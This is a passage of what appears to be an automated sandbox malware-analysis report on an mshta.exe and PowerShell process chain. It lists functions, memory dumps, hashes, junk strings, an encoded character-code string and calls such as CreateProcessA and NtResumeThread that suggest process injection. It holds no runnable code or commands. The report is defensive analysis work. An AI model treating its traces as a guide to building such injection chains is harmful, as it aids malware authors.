Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D40FA7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D40FAF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 4108, Parent PID: 6748COMMON

Executed Functions

Function 07861ED0 Relevance: 13.2, Strings: 10, Instructions: 740COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07862100
4'^q, xrefs: 078625EA
4'^q, xrefs: 078625F6
4'^q, xrefs: 07862710
4'^q, xrefs: 07862672
4'^q, xrefs: 078627D8
4'^q, xrefs: 078620F4
4'^q, xrefs: 07862704
4'^q, xrefs: 078627CC
4'^q, xrefs: 07862666

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-518715366
Opcode ID: 1f8389952b093ffd20d0eb7f9a4543c192e8d0d52a254085acb9ca14fcea8fe0
Instruction ID: 2ae083f66596ff7b23a0e734a24efb24f0c7985ef6079107713c4553e3106eae
Opcode Fuzzy Hash: 1f8389952b093ffd20d0eb7f9a4543c192e8d0d52a254085acb9ca14fcea8fe0
Instruction Fuzzy Hash: AD52B2B4B00205AFDB14DF58C858BAEBBE2BBA8305F54C4A9D905AF395CB31DC45CB91

Function 07861618 Relevance: 10.4, Strings: 8, Instructions: 391COMMON

Download Yara Rule

Strings

$^q, xrefs: 078618DB
$^q, xrefs: 078618B0
$^q, xrefs: 078618CF
$^q, xrefs: 078618BC
tP^q, xrefs: 07861920
$^q, xrefs: 07861894
tP^q, xrefs: 07861914
$^q, xrefs: 07861878

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-815214575
Opcode ID: 745ac330c7743bb948594634f65a1a34c43c7ac26f3a469b512c20164d8cd1ab
Instruction ID: 6cd321206d945ef620ae3addd82231c3f55bc9e67904c6de0725b268d7018a8b
Opcode Fuzzy Hash: 745ac330c7743bb948594634f65a1a34c43c7ac26f3a469b512c20164d8cd1ab
Instruction Fuzzy Hash: 7CC178B5F10219AFCB148F79880CA7ABBE29FE6611B18846BC505CF293DB31CD05C7A1

Function 07861EB3 Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

4'^q, xrefs: 078620F4

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9d37643d760202f05a7c5f146064e13f0494639901eb725889b33f028c24438d
Instruction ID: dd799e069710570e867b12a6c1f2a6cae9b594f973b3d032d6ed2a6d33975b1c
Opcode Fuzzy Hash: 9d37643d760202f05a7c5f146064e13f0494639901eb725889b33f028c24438d
Instruction Fuzzy Hash: 0EA163B4A00205AFDB14DF58C548BAEBBF3BBA9304F54C055EA05AB395CB71E845CB51

Function 07861AD8 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6567f8af3aa725686246c0075607588415f3124390b40b0c7fca087f3a6706aa
Instruction ID: d9e5a94429601a8e937a4aa97f91820193411d972cb96fbadb97b816a2c4613f
Opcode Fuzzy Hash: 6567f8af3aa725686246c0075607588415f3124390b40b0c7fca087f3a6706aa
Instruction Fuzzy Hash: 36913EB4B00208EFCB14CF58C498AA9BBF2AF99315F54C059D905AF356CB72DC45CB91

Function 07861ABC Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad942d0bfad134ec9d41e3e50522d123e709e08626b32b6767fd219cfa8276fc
Instruction ID: c1ec20da74c44b5d3283f3dab786c6c2d8666d814103fc55dbee3faadeb4dcfb
Opcode Fuzzy Hash: ad942d0bfad134ec9d41e3e50522d123e709e08626b32b6767fd219cfa8276fc
Instruction Fuzzy Hash: 39914DB4A00209EFCB14CF54C588AA9BBF2EFA9325F54C159D904AB356C772EC45CFA1

Function 078615F7 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20a56a46d5fbd1b65c5ae3e39da6a805c9832993cc2ca10085d0953615d5956
Instruction ID: 86600c3a706170e8bf3e2dd181d441ddca9387078148aed0fd95097533b3fc8c
Opcode Fuzzy Hash: e20a56a46d5fbd1b65c5ae3e39da6a805c9832993cc2ca10085d0953615d5956
Instruction Fuzzy Hash: E54117B5F10205AFCB148F64889CABD7BE29BA5204F5880A5D501DF2A3DB35DD45CBA1

Non-executed Functions

Function 0786184C Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

$^q, xrefs: 078618B0
$^q, xrefs: 078618CF
$^q, xrefs: 07861894
tP^q, xrefs: 07861914
$^q, xrefs: 07861878

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: dc1dfe7e013200013fe2030bb6e6c0013def6a5a4dcb7ac079c827eb64c28c21
Instruction ID: 79b76dc7a102745431aef09471b95c63d547086c6ca5c78dd276a0199b821a13
Opcode Fuzzy Hash: dc1dfe7e013200013fe2030bb6e6c0013def6a5a4dcb7ac079c827eb64c28c21
Instruction Fuzzy Hash: 572123B6E1031DAFDB248E64D54CA65BBF5AFA2A10F18415BD840DF253CB31D904C762

Function 07861860 Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

$^q, xrefs: 078618B0
$^q, xrefs: 078618CF
$^q, xrefs: 07861894
tP^q, xrefs: 07861914
$^q, xrefs: 07861878

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: e611f7be5051b9cc096a4a5738db0891d89df2c0c72cda09bfba9b125e69f6b0
Instruction ID: 1848acbfc12da1b2cd6d90efbd6381787f7c989b7486874c07693241d13a7b4b
Opcode Fuzzy Hash: e611f7be5051b9cc096a4a5738db0891d89df2c0c72cda09bfba9b125e69f6b0
Instruction Fuzzy Hash: EB21F1B6E1021EAFDB288E55C54CA66B7F5AFA1A10F54415AE800DF353DB31D904C7A2

Function 078613C0 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0786142B
4'^q, xrefs: 07861437
$^q, xrefs: 0786140A
$^q, xrefs: 07861416

Memory Dump Source

Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7860000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: d0ee3ce6e097cf19ea249e19fb741e64528f1dfb654b69b0fa8c34e69f9a0735
Instruction ID: 01fea04585c617df03e2326976c5f04aa303e85bb4a87546a2b5a4ed63f1bac0
Opcode Fuzzy Hash: d0ee3ce6e097cf19ea249e19fb741e64528f1dfb654b69b0fa8c34e69f9a0735
Instruction Fuzzy Hash: F801F551B1D39A5BC73B163858286A56FB25FD365171901DBC080CF29BCE144D8983E2

Analysis Process: powershell.exePID: 6272, Parent PID: 4108COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	53.3%
Total number of Nodes:	15
Total number of Limit Nodes:	2

Executed Functions

Function 068E62FF Relevance: 4.3, Strings: 2, Instructions: 1808COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068E60D1
4'^q, xrefs: 068E603E

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 698978c5d6d6e8dfa92362d92b1a07d026ee76bd8fcc3dafaba18a7967536582
Instruction ID: 563fd0192d3130476ab5169ee5f56aa57599d256fc94e117fe7a9dbf885119eb
Opcode Fuzzy Hash: 698978c5d6d6e8dfa92362d92b1a07d026ee76bd8fcc3dafaba18a7967536582
Instruction Fuzzy Hash: 830330B4A002149FD754CB54C890BA9BBB2EF99304F54C1E9DA09AF391CB71ED86CF91

Function 06948B16 Relevance: 1.8, APIs: 1, Instructions: 253processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06948CFA

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3bf36fedd545f743ccfa390156636ad5ea6c00faa289f8d93dccaa28264883bb
Instruction ID: 8446f15bcd3d56f8d8ae817fd3b0ff33b88100be0a09919601b5159405072270
Opcode Fuzzy Hash: 3bf36fedd545f743ccfa390156636ad5ea6c00faa289f8d93dccaa28264883bb
Instruction Fuzzy Hash: A8A14A70D012498FDB90DFA9C985BEEBBF1FF48314F24852AE859A7680D7749881CF81

Function 0694A1EA Relevance: 1.6, APIs: 1, Instructions: 59nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0694A25E

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f84b8e2cb5777cd643f949d4e8dd8ad6fcf51f10557a6a2332e04c2261445108
Instruction ID: 36ed9a0aae2f58926e93bc53b8f89e78d50544c822b9eefacd57d9d0ad0ce6b2
Opcode Fuzzy Hash: f84b8e2cb5777cd643f949d4e8dd8ad6fcf51f10557a6a2332e04c2261445108
Instruction Fuzzy Hash: 0C1108B1D103498EDB14DFAAC844ADFFBF4EF88320F14842AD419A7240CB75A945CFA5

Function 0694A1F0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0694A25E

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 86561fa08f019a92847bb9ad4d65d9f3748f7922b0ea758f668935433c804150
Instruction ID: 800e1e7708bd36c5007b458a8edbe8b258dcd9abc844d39b51cbb271afc2abfc
Opcode Fuzzy Hash: 86561fa08f019a92847bb9ad4d65d9f3748f7922b0ea758f668935433c804150
Instruction Fuzzy Hash: D811E7B1D043498FDB14DFAAC485A9EFBF4EF88324F14842AD419A7240CB75A945CFA5

Function 0694A2A0 Relevance: 1.5, APIs: 1, Instructions: 44nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0694A25E

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a60c48ee7249a1347c4cec47b042b2dc2eefc85a6eb44b62f8a08ee49898bd64
Instruction ID: 961e915e9d17c1779623cf38e89fa1be6d8e13ce67662a96555d4450bb6c8598
Opcode Fuzzy Hash: a60c48ee7249a1347c4cec47b042b2dc2eefc85a6eb44b62f8a08ee49898bd64
Instruction Fuzzy Hash: 0101F2719043098FDB10EB6AC804BEEFBF8AF91324F24845AD045E7250CA395946CB61

Function 069416B8 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

PH^q, xrefs: 069419DD

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: c88849a89749ac4f19b49ab90510e7bdb4a5b98fde15f426b50e79c3cab9d92c
Instruction ID: 3bb3385130d3f798968d33c8625b0a19a41e4031bd03a36c5e83a2d13fab0a84
Opcode Fuzzy Hash: c88849a89749ac4f19b49ab90510e7bdb4a5b98fde15f426b50e79c3cab9d92c
Instruction Fuzzy Hash: C7D11370E05208CFEBA4DF69D444BADBBF2BB49304F2090A9D409A7B55DB706D85CF41

Function 06710BC8 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06710D44

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 379549e9b5ca3c194db6a0c399a65b316191bef82fa300f5c53e4118b77002f4
Instruction ID: e56815c55c48f6319f8221228b58aaa7c3a181b54d102ed7dae60afe63801b02
Opcode Fuzzy Hash: 379549e9b5ca3c194db6a0c399a65b316191bef82fa300f5c53e4118b77002f4
Instruction Fuzzy Hash: 0EB10774E15218CFDB94DFA9D884BADBBF2BF49314F20916AE409EB251DB306985CF40

Function 06710BC2 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06710D44

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: a0a90416782a44632a2e2f80259ba8c2a8cd57ca9f895e40c8f067ba3046450c
Instruction ID: 2ae12693d05f9abcfd266fa70035e2ade1d989692426660a96bf5ceb7a0cee30
Opcode Fuzzy Hash: a0a90416782a44632a2e2f80259ba8c2a8cd57ca9f895e40c8f067ba3046450c
Instruction Fuzzy Hash: 13B1C574E11218CFDB94DFA9D884BADBBF2BF49314F20916AE409EB251DB706985CF40

Function 06710F3B Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06710D44

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: d5b2f00e0fd4c2964055b17d5abb0663419286ce783c6236fa4fbb6b7fc8c815
Instruction ID: 00328f445b33b28947dcfa1b669da62afe991159e7aef901c17f76a89b4d7152
Opcode Fuzzy Hash: d5b2f00e0fd4c2964055b17d5abb0663419286ce783c6236fa4fbb6b7fc8c815
Instruction Fuzzy Hash: E5A1E574E11218CFDB94CFA9D484B9DBBF2FB49314F2091AAE409EB251DB70A985CF40

Function 06701DAB Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f221f0dc689fca26be335e0c7f21294558974529d15b0f12cd4a31cd28b1aeb0
Instruction ID: c1d014686877b3ba4d21c948c3dcf195eb49ae69a5b86650b0c336d699a61aaa
Opcode Fuzzy Hash: f221f0dc689fca26be335e0c7f21294558974529d15b0f12cd4a31cd28b1aeb0
Instruction Fuzzy Hash: CA52A2B4A00628CFDBA0DF28D988B9AB7F6BF48301F1491D5990DA7355DB34AE81CF51

Function 06FE6EB8 Relevance: 31.4, Strings: 24, Instructions: 1408COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06FE7C3D
4'^q, xrefs: 06FE7E63
$^q, xrefs: 06FE7E3B
$^q, xrefs: 06FE7862
4'^q, xrefs: 06FE7A82
122,65,75,78,106,100,121,78,110,66,122,71,51,52,86,66,84,100,114,67,106,119,78,89,120,48,89,73,71,81,54,67,119,119,120,74,119,115,, xrefs: 06FE7989
_, xrefs: 06FE774F
4'^q, xrefs: 06FE7A8E
$^q, xrefs: 06FE783D
4'^q, xrefs: 06FE73BA
4'^q, xrefs: 06FE78BF
4'^q, xrefs: 06FE7C49
$^q, xrefs: 06FE7A6B
$^q, xrefs: 06FE7A5F
$^q, xrefs: 06FE7DE6
4'^q, xrefs: 06FE78CB
$^q, xrefs: 06FE7D9B
4'^q, xrefs: 06FE7E6F
$^q, xrefs: 06FE7870
$^q, xrefs: 06FE7E47
$^q, xrefs: 06FE7A43
$^q, xrefs: 06FE7DF6
4'^q, xrefs: 06FE73C6
$^q, xrefs: 06FE7DBC

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 122,65,75,78,106,100,121,78,110,66,122,71,51,52,86,66,84,100,114,67,106,119,78,89,120,48,89,73,71,81,54,67,119,119,120,74,119,115,$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$_$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3262490275
Opcode ID: d1b60fdadc40a91750c09934dc0a29782b87ff3c45f156e572430b6c810e14f6
Instruction ID: c90e18523ab84c3a60f27d5e69c036317621eb06f2d7e4ecb9cf73fe4271b861
Opcode Fuzzy Hash: d1b60fdadc40a91750c09934dc0a29782b87ff3c45f156e572430b6c810e14f6
Instruction Fuzzy Hash: 58B2BF31F00209DFDBA4EF69C844A6ABFF2AF85311F24C46AD9099B355DB31D846CB91

Function 06FE5CC8 Relevance: 25.7, Strings: 20, Instructions: 704COMMON

Download Yara Rule

Strings

tP^q, xrefs: 06FE63CF
(o^q, xrefs: 06FE6218
$^q, xrefs: 06FE5D6E
$^q, xrefs: 06FE61ED
$^q, xrefs: 06FE5DE7
$^q, xrefs: 06FE5FD1
tP^q, xrefs: 06FE601C
tP^q, xrefs: 06FE6028
4'^q, xrefs: 06FE636D
4'^q, xrefs: 06FE5E8A
$^q, xrefs: 06FE61B6
$^q, xrefs: 06FE5E4C
$^q, xrefs: 06FE5E3C
$^q, xrefs: 06FE5DB0
(o^q, xrefs: 06FE6228
4'^q, xrefs: 06FE6379
4'^q, xrefs: 06FE5E96
$^q, xrefs: 06FE61DD
$^q, xrefs: 06FE5DD7
tP^q, xrefs: 06FE63C3

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2087719723
Opcode ID: 39adfbd0769287fa8ce489fe2bb924a1de35c9442d3756750d6e3ab50224bda0
Instruction ID: b980e4e2acaf6cbd84cee295dd4072e530621d8898d4476de72d3f8e83c3322b
Opcode Fuzzy Hash: 39adfbd0769287fa8ce489fe2bb924a1de35c9442d3756750d6e3ab50224bda0
Instruction Fuzzy Hash: 8E324231F04209DFEF658F68C8447AABFE2AF95315F14846AE905DF281DB32D845C7A1

Function 06FE83C0 Relevance: 21.9, Strings: 17, Instructions: 682
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06FE9E7E
$^q, xrefs: 06FEA014
4'^q, xrefs: 06FEA2D3
4'^q, xrefs: 06FE9E72
4'^q, xrefs: 06FEA0C6
tP^q, xrefs: 06FE9DBD
$^q, xrefs: 06FEA094
tP^q, xrefs: 06FE9DC9
4'^q, xrefs: 06FEA2C7
$^q, xrefs: 06FEA044
$^q, xrefs: 06FEA256
$^q, xrefs: 06FEA036
$^q, xrefs: 06FEA223
$^q, xrefs: 06FEA248
$^q, xrefs: 06FEA084
4'^q, xrefs: 06FEA0D2
$^q, xrefs: 06FE9FF8

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2733347440
Opcode ID: e7ebbebb49af7e2a767346000ce71f1d08d3a7f17beb8276aea5fb2be1bf48ce
Instruction ID: ac42f0950f1c90138b0b20fc00c900725adbbfb40c5c368955841389ed76736d
Opcode Fuzzy Hash: e7ebbebb49af7e2a767346000ce71f1d08d3a7f17beb8276aea5fb2be1bf48ce
Instruction Fuzzy Hash: E0524874F003049FEB54DB98C844A6ABBB2BF89354F64C069D919AF355CB32EC46CB91

Function 06FE10A8 Relevance: 17.3, Strings: 13, Instructions: 1075COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE1A56
4'^q, xrefs: 06FE1759
$^q, xrefs: 06FE15C3
$^q, xrefs: 06FE1CD4
$^q, xrefs: 06FE1A4C
$^q, xrefs: 06FE15D1
4'^q, xrefs: 06FE14C7
$^q, xrefs: 06FE1CDE
4'^q, xrefs: 06FE18E0
4'^q, xrefs: 06FE14BD
4'^q, xrefs: 06FE18D4
$^q, xrefs: 06FE15A2
4'^q, xrefs: 06FE1765

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-928407100
Opcode ID: 4f5d95da304288a5114b557295c1a26b73514f199504f32c50b4407209cf7426
Instruction ID: 69249244dc1d1d17f329545fcdfd354aef323ffe60c5580264ed27d5a1d9b6d6
Opcode Fuzzy Hash: 4f5d95da304288a5114b557295c1a26b73514f199504f32c50b4407209cf7426
Instruction Fuzzy Hash: ED723731F043548FDB65CB6A885566BBFE6AFC6311F28C4ABD446CB282DB31C845C7A1

Function 068E7F10 Relevance: 16.3, Strings: 12, Instructions: 1319COMMON

Download Yara Rule

Strings

XtS, xrefs: 068E8AA7
XtS, xrefs: 068E8A99
(o^q, xrefs: 068E8E91
4'^q, xrefs: 068E8A1D
(o^q, xrefs: 068E8EA1
4'^q, xrefs: 068E8CE3
tP^q, xrefs: 068E80CE
4'^q, xrefs: 068E8CEF
h|S, xrefs: 068E8F45
4'^q, xrefs: 068E8A11
h|S, xrefs: 068E8F37
tP^q, xrefs: 068E80DA

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$XtS$XtS$h|S$h|S$tP^q$tP^q
API String ID: 0-4271814089
Opcode ID: 5ec40da746c4d13f7ff86142e80ad48dbc7c3bcc6c8b3a140c2f88a46d5e1951
Instruction ID: 0f37af2ad27d8014bbb217ae3152c0803043b3445d4001730b63028fe73063d6
Opcode Fuzzy Hash: 5ec40da746c4d13f7ff86142e80ad48dbc7c3bcc6c8b3a140c2f88a46d5e1951
Instruction Fuzzy Hash: C2A2F6B0F042089FDB558F68C844A6EBBE2AF86315F18C4AAD905DF291DB31DC45CBA1

Function 06FE2830 Relevance: 9.1, Strings: 7, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06FE2A02
Piy, xrefs: 06FE2A7B
Piy, xrefs: 06FE2A71
$^q, xrefs: 06FE28A3
4'^q, xrefs: 06FE2C3B
$^q, xrefs: 06FE29F8
4'^q, xrefs: 06FE2C47

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$Piy$Piy$$^q$$^q$$^q
API String ID: 0-4097072622
Opcode ID: d7b14de8d72fe909cf97564408afa141c77ffcf84fab7f84000b1026ba07e884
Instruction ID: df63385bd6e78a025eb6c36d1db6ff2b1eb3206c199340d913dfed200a62bff3
Opcode Fuzzy Hash: d7b14de8d72fe909cf97564408afa141c77ffcf84fab7f84000b1026ba07e884
Instruction Fuzzy Hash: CCE1C131F002048FDB54CB68C495AAABFF6AF89311F15C4AAD805AF356DB31DE85CB91

Function 06FEE180 Relevance: 8.1, Strings: 6, Instructions: 624COMMON

Download Yara Rule

Strings

tP^q, xrefs: 06FEE768
tP^q, xrefs: 06FEE774
4'^q, xrefs: 06FEE294
4hS, xrefs: 06FEE8F7
4hS, xrefs: 06FEE905
4'^q, xrefs: 06FEE2A0

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4hS$4hS$tP^q$tP^q
API String ID: 0-164820830
Opcode ID: 59f345edf71e5c3084ac694fef722d31cf63d4929806b5c0e926d4388239be2b
Instruction ID: c1425cf3ee443fda5d0b8999039c854847a7290cf2f4d774e1e8f5346e1c7e51
Opcode Fuzzy Hash: 59f345edf71e5c3084ac694fef722d31cf63d4929806b5c0e926d4388239be2b
